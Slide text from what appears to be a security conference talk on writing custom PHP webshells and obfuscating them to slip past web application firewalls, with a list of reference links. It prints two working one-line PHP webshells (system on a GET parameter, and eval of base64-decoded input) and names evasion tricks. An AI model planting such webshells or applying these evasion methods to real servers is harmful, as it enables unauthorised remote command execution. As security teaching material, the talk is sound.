I HAVE A DOG NAMED WAF
jomoza@wafbypass:/home/bitup# cat talk | more
jomoza@wafbypass:/home/bitup# whoami
Josep Moreno (JoMoZa)
[email protected]/loveisinthenet
[*] loveisinthe.net
@bitupalicante [*] bitupalicante.com
Webshell uploaded...
5 MINS LATER...
404
If you ask about public webshells...
- Can include bad things (miners, ...)
- Can include obfuscated functions (functionality-less)
- IDS/WAF detection
Make your own webshell, and for that...
Let's talk about PHP obfuscation, vulnerable functions and some bash tricks...
IT’S A BIND SHELL
Apache, NGINX, Tomcat... Firefox, Chrome...
webshells...
<?php
echo system($_GET["cmd"]);
?>
RCE:
# Remote CODE Execution
(Application context: "asp, jsp, php..." functions)
# Remote COMMAND Execution
(System context: "bash, sh, cmd, ...")
jomoza@wafbypass:/home/bitup# php -c rce
https://stackoverflow.com/questions/3115559/exploitable-php-functions
LeT’s ObFuScAtE
SyStEm() FuN
jomoza@wafbypass:/home/bitup# ./makeitcool “system()”
ADD COMMENTS AND HEX
http://php.net/manual/en/functions.variable-functions.php
https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/
CONCATENATED STRING
USING DEFINED FUNCTIONS
/*SINGLE STRING CHARACTER*/
https://secure.php.net/manual/es/language.operators.string.php
APPLICATION
CONTEXT.
jomoza@wafbypass:/home/bitup# php “<?php rce; ?>”
https://stackoverflow.com/questions/3115559/exploitable-php-functions
jomoza@wafbypass:/home/bitup# fileless like webshell
<?php eval(base64_decode($_GET["bcode"]));
?>
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
FILELESS ARE YOU?
jomoza@wafbypass:/home/bitup# fileless like webshell
#2
SYSTEM
CONTEXT.
DEMO #3
jomoza@wafbypass:/home/bitup# bash globbing
jomoza@wafbypass:/home/bitup# string literal concatenation
$ php -r 'echo "hello"." world"."\n";'
hello world
https://unix.stackexchange.com/questions/10263/how-to-concatenate-string-variables-into-a-third
jomoza@wafbypass:/home/bitup# undefined variables
https://www.secjuice.com/web-application-firewall-waf-evasion/
jomoza@wafbypass:/home/bitup# ./metamorphws start
jomoza@wafbypass:/home/bitup# curl “http://bibliography”
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
https://www.secjuice.com/web-application-firewall-waf-evasion/
https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
https://github.com/PortSwigger/bypass-waf
https://stackoverflow.com/questions/3115559/exploitable-php-functions
https://es.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
@j0moz4
@bitupalicante